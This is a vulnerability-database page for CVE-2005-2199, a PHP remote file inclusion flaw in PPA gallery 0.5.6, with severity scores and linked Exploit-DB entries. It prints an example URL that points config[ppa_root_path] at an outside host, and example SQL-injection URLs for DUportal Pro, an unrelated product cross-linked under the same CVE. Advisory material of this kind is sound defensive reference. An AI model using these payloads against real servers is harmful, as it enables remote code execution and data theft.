CVE-2005-2199
published 2005-07-11CVE-2005-2199: PHP remote file inclusion vulnerability in inc/functions.inc.php in PPA web photo gallery 0.5.6 allows remote attackers to execute arbitrary code via the…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
10.07%
95.0th percentile
PHP remote file inclusion vulnerability in inc/functions.inc.php in PPA web photo gallery 0.5.6 allows remote attackers to execute arbitrary code via the config[ppa_root_path] variable.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| skrypty | ppa_gallery | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PPA 0.5.6 - 'ppa_root_path' File Inclusion
exploitdb·2005-07-10
CVE-2005-2199 PPA 0.5.6 - 'ppa_root_path' File Inclusion
PPA 0.5.6 - 'ppa_root_path' File Inclusion
---
source: https://www.securityfocus.com/bid/14209/info
PPA is susceptible to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/inc/functions.inc.php?config[ppa_root_path]=http://www.example.com
Exploit-DB
DUware DUportal 3.4.3 Pro - Multiple SQL Injections
exploitdb·2005-06-22
CVE-2005-2199 DUware DUportal 3.4.3 Pro - Multiple SQL Injections
DUware DUportal 3.4.3 Pro - Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/14029/info
DUportal Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Some of these issues may have previously been discussed in BID 13285 and BID 13288.
http://www.example.com/DUportalPro34/Articles/default.asp?iChannel=2[SQL Inject]&nChannel=Articles
http://www.example.com/DUportalPro34/Articles/detail.asp?iData=4[SQL Inject]&iCat=292&iChannel=2&nChannel=
No writeups or analysis indexed.
2005-07-11
Published